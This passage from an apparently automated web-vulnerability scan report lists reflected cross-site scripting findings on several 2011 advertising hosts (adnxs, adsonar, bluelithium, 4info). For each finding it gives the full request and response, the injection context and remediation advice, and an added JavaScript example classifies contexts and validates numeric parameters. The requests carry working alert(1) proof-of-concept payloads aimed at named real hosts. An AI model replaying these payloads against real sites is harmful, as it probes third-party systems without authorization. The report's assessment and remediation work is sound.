document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250906f3'-alert(1)-'8a5c815ddd2&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250906f3%27-alert%281%29-%278a5c815ddd2%26s%3D229800
...[SNIP]...

4.42. http://adnxs.revsci.net/imp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks: the same document.write('<scr'+'ipt ... src="..."') literal as 4.41. The payload f3e33'-alert(1)-'9eac11f134b was submitted in the s parameter. This input was echoed unmodified into the inv_code parameter of the generated src URL, while the copy inside the nested redir parameter is correctly percent-encoded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

s is an integer identifier (2298003 in the legitimate request); reject anything that is not all digits. Otherwise the fix is the same as 4.41: encode every URL component the way redir already is, then escape the finished URL for the JavaScript literal it is written into.

Request

GET /imp?Z=300x250&s=2298003f3e33'-alert(1)-'9eac11f134b&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:53:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:53:10 GMT
Content-Length: 454

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003f3e33'-alert(1)-'9eac11f134b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003f3e33%27-alert%281%29-%279eac11f134b%26r%3D1%26_salt%3D1576960469%26u%3Dhttp%253A
...[SNIP]...

4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags: it appears inside a java.lang.NumberFormatException message that the page prints into <head>, directly after a closing </script> tag. The payload 379d8<script>alert(1)</script>9352c1ee60b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is declared text/html; charset=utf-8, so the injected <script> element is parsed and executed. The message also discloses that the backend is Java and that pid is parsed as an integer only after the request has reached the page, which points at the fix: check that pid is numeric before parsing it, and return a generic error page that does not echo the value.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495&pid=2083767379d8<script>alert(1)</script>9352c1ee60b&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:04 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "2083767379d8<script>alert(1)</script>9352c1ee60b"

   
                                                           </head>
...[SNIP]...

4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment holding the java.lang.NumberFormatException message. The payload cb6e8--><script>alert(1)</script>c9166046b4e was submitted in the placementId parameter. This input was echoed unmodified in the application's response, and the --> in the payload closes the comment so the script element that follows is parsed as markup. Unlike 4.43, this response is declared Content-Type: text/plain and carries no X-Content-Type-Options header: a browser that honours the declared type displays the body as text, so the script only runs in clients that sniff the body as HTML (older Internet Explorer versions do).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. placementId is an integer; validate it before parsing, log the rejected value on the server and return a generic error rather than the exception text. If a value must be echoed, HTML-encode it so that neither --> nor <script> survives, and keep it out of comments altogether. Separately, declare the body as what it is (text/html) and send X-Content-Type-Options: nosniff, so the outcome does not depend on the client's sniffing.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500495cb6e8--><script>alert(1)</script>c9166046b4e&pid=2083767&zw=300&zh=250&url=http%3A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/&v=5&dct=Exclusive%3A%20Melissa%20Rivers%20Splits%20With%20Boyfriend%20%7C%20tooFab.com&ref=http%3A//www.toofab.com/&metakw=Melissa%20Rivers,Joan%20Rivers,Jason%20Zimmerman HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:47 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3356
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1500495cb6e8--><script>alert(1)</script>c9166046b4e" -->
...[SNIP]...

4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment holding the java.lang.NumberFormatException message, the same code path as 4.44. The payload 92fce--><script>alert(1)</script>3d86a354bdc was submitted in the ps parameter (appended to its legitimate value -1). This input was echoed unmodified in the application's response, which, as in 4.44, is declared text/plain without X-Content-Type-Options, so execution depends on the client sniffing the body as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Same fix as 4.44: ps is an integer, so validate it before parsing, log rather than echo the rejected value, HTML-encode anything that must be shown, and declare the correct Content-Type with X-Content-Type-Options: nosniff.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767&ps=-192fce--><script>alert(1)</script>3d86a354bdc&zw=250&zh=325&url=http%3A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/&v=5&dct=Nancy%20Grace%20--%20RUMPSHAKIN'%20in%20the%20TMZ%20Ballroom!!%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3870
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-192fce--><script>alert(1)</script>3d86a354bdc" -->
   
...[SNIP]...

4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks: the rm_url assignment in the inline script. The payload 2b778"-alert(1)-"c081c9a4e0 was submitted as the parameter name. This input was echoed unmodified in the application's response, because the server rebuilds the query string of rm_url from every parameter it received, unknown names included. The response carries no Content-Type header at all, so the browser sniffs the body as HTML and runs the inline script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Build the query string of rm_url from the parameters the server actually knows (the request's ad_type, ad_size and section, which it already maps to Z and s) and drop unknown names; any value that is kept must be percent-encoded as a URL component and the finished URL escaped for the double-quoted JavaScript literal. Independently, send an explicit Content-Type: text/html and X-Content-Type-Options: nosniff so the client does not have to guess the type.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2475049&2b778"-alert(1)-"c081c9a4e0=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1&s=2475049&_salt=2441704624";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the href of the imageclick link. The payload 960fe"><script>alert(1)</script>af24f5e639e was submitted as the parameter name and was echoed unmodified, so the quote and > close the attribute and the <a> tag, and the script element that follows is parsed as markup. This is the same unknown-parameter reflection as 4.46 landing in a second context of the same response; a fix has to encode for each context separately, and dropping unknown parameter names removes both at once.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
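Two things a reviewer of 4.43 to 4.47 would want, as an added example that is not code from adsonar.com or bluelithium.com: a small classifier that reports which HTML context a probe landed in, run over abbreviated excerpts copied from the responses quoted in those findings, and a stand-in for the getAds.jsp parameter handling that rejects the non-numeric values instead of echoing the Java exception. The excerpts are from the report; the function names, the handler and its parameter list are assumptions for illustration.

```javascript
// Added example, not code from adsonar.com or bluelithium.com: classify the
// context each probe in findings 4.43-4.47 landed in, then the server-side
// fix for the adsonar error pages. Function names and the stand-in handler
// are assumptions for illustration.

// Abbreviated response excerpts copied from the report, keyed by finding.
// "marker" is the unique prefix of the probe Burp submitted.
const EXCERPTS = {
  "4.43": { marker: "379d8", body:
    '</script>\n java.lang.NumberFormatException: For input string: ' +
    '"2083767379d8<script>alert(1)</script>9352c1ee60b"\n</head>' },
  "4.44": { marker: "cb6e8", body:
    '<body>\n<!-- java.lang.NumberFormatException: For input string: ' +
    '"1500495cb6e8--><script>alert(1)</script>c9166046b4e" -->' },
  "4.46": { marker: "2b778", body:
    '<script type="text/javascript">var rm_url=""; rm_url = ' +
    '"http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1";</script>' },
  "4.47": { marker: "960fe", body:
    '<a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)' +
    '</script>af24f5e639e=1&Z=1x1" target="_parent">' },
};

// Classify the context of the text just before the marker: the most recently
// opened and not yet closed construct wins.
function contextOf(body, marker) {
  const at = body.indexOf(marker);
  if (at < 0) return "not reflected";
  const before = body.slice(0, at);
  const last = (s) => before.lastIndexOf(s);
  if (last("<!--") > last("-->")) return "comment";
  if (last("<script") > last("</script")) return "script";
  if (last("<") > last(">")) return "tag";   // inside a tag, i.e. an attribute
  return "text";
}

function classifyAll() {
  const out = {};
  for (const [id, e] of Object.entries(EXCERPTS)) out[id] = contextOf(e.body, e.marker);
  return out;
}

// Fix for the adsonar pages: parse the numeric parameters strictly and never
// echo the raw value. Anything that does reach the page is HTML-encoded, which
// also keeps "-->" and "<script>" from being interpreted inside a comment.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function parseId(raw) {
  // Plain decimal integers only; "1500495cb6e8..." is rejected here rather
  // than by the Java integer parser with the input echoed back.
  return /^-?\d{1,10}$/.test(raw) ? Number(raw) : null;
}

// Minimal stand-in for getAds.jsp: validates placementId, pid and ps and
// reports a failure by parameter name only. The offending value belongs in
// the server log, not in the response.
function handleGetAds(params) {
  for (const name of ["placementId", "pid", "ps"]) {
    if (parseId(params[name] ?? "") === null) {
      return { status: 400, contentType: "text/html; charset=utf-8",
               body: "<p>Invalid parameter: " + htmlEncode(name) + "</p>" };
    }
  }
  return { status: 200, contentType: "text/html; charset=utf-8",
           body: "<!-- placement " + params.placementId + " -->" };
}
```

classifyAll() reports text for 4.43, comment for 4.44, script for 4.46 and tag for 4.47, which is exactly what the four Issue detail paragraphs say; the classifier is deliberately naive (it does not handle nested quoting), so treat it as a triage check, not as proof of exploitability. handleGetAds rejects each probe with a 400 that names only the parameter, and the success path writes a comment containing only the validated number.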

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2475049&960fe"><script>alert(1)</script>af24f5e639e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4712
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)</script>af24f5e639e=1&Z=1x1&s=2475049&_salt=983545231&t=2" target="_parent">
...[SNIP]...

4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 7b4c8<script>alert(1)</script>7900287ce39 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=10397677b4c8<script>alert(1)</script>7900287ce39&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:49:31 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "10397677b4c8<script>alert(1)</script>7900287ce39"

   
                                                           </head>
...[SNIP]...

4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 1c8c0--><script>alert(1)</script>d8f33500b41 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=14593081c8c0--><script>alert(1)</script>d8f33500b41&pid=1039767&ps=-1&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:58 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3321
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "14593081c8c0--><script>alert(1)</script>d8f33500b41" -->
...[SNIP]...

4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4ea7c--><script>alert(1)</script>2eed884a416 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1459308&pid=1039767&ps=-14ea7c--><script>alert(1)</script>2eed884a416&zw=590&zh=225&url=http%3A//www.tmz.com/&v=5&dct=Celebrity%20Gossip%20%7C%20Entertainment%20News%20%7C%20Celebrity%20News%20%7C%20TMZ.com&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3760
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14ea7c--><script>alert(1)</script>2eed884a416" -->
   
...[SNIP]...

4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the ad_creative_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba94d'%3balert(1)//bdd52ed5568 was submitted in the ad_creative_id parameter. This input was echoed as ba94d';alert(1)//bdd52ed5568 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522ba94d'%3balert(1)//bdd52ed5568&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:53:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
hone1.value + document.alertForm.phone2.value + document.alertForm.phone3.value;
var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo;
   url += '&creativeID=10000522ba94d';alert(1)//bdd52ed5568&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg';

   
       var leagueId = _gel('leagueId').value;
       if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId;
       els
...[SNIP]...

4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The value of the ad_referral_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bfe2'%3balert(1)//712e3a0ece8 was submitted in the ad_referral_url parameter. This input was echoed as 5bfe2';alert(1)//712e3a0ece8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg5bfe2'%3balert(1)//712e3a0ece8&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 17204
Date: Sat, 17 Sep 2011 01:51:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
ue;
var url = 'http://alerts.4info.com/SetUpAlert?serviceID=4' + '&umda=tel:' + phoneNo;
   url += '&creativeID=10000522&affiliateID=null' + '&referralURL=http://www.bostonherald.com/mobile/info.bg5bfe2';alert(1)//712e3a0ece8';

   
       var leagueId = _gel('leagueId').value;
       if (leagueId == NASCAR_leagueId) url += "&leagueID=" + leagueId;
       else url += "&teamID=" + _gel('teamId').value;
   

if (window.XMLHttpReque
...[SNIP]...

4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

